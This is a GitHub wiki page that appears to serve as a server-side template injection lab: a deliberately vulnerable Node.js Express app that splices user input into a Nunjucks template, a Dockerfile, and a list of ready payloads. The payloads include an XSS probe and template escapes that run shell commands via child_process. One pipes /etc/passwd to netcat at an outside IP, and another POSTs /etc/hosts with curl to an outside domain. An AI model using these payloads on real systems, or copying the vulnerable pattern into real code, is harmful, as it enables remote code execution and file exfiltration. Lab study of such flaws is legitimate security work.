SSTI nodejs 04 - yujitounai/helloworld GitHub Wiki
const express = require('express')
var bodyParser = require('body-parser');
const app = express()
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
//Dependent of Templating engine
var nunjucks = require('nunjucks');
const port = 5065
function getHTML(input){
var template =`<!DOCTYPE html><html><body>
<form action="/" method="post">
First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>Hello `+input+`</p></body></html>`
nunjucks.configure({ autoescape: true });
html = nunjucks.renderString(template, { username: 'James' });
console.log(input)
console.log(html);
return html;
}
app.post('/', (request, response) => {
var input = request.param('name', "")
var html = getHTML(input)
response.send(html);
})
app.get('/', (request, response) => {
var html = getHTML("")
response.send(html)
})
app.listen(port, (err) => {
if (err) {
return console.log('something bad happened', err)
}
console.log(`server is listening on ${port}`)
})
- Dockerfile
FROM node:6
COPY src/ /home
RUN npm install
RUN npm install nunjucks
RUN npm install express
#set($xss = '<script>alert(1);</script>') $xss
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('sleep 5').toString()")()}}
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('cat /etc/passwd | nc 192.168.5.33 7777').toString()")()}}
{{constructor.constructor("global.process.mainModule.require('child_process').execSync('curl -XPOST http://bogus.jp/postaccess.php -d @/etc/hosts').toString()")()}}
https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/tree/master/javascript/Nunjucks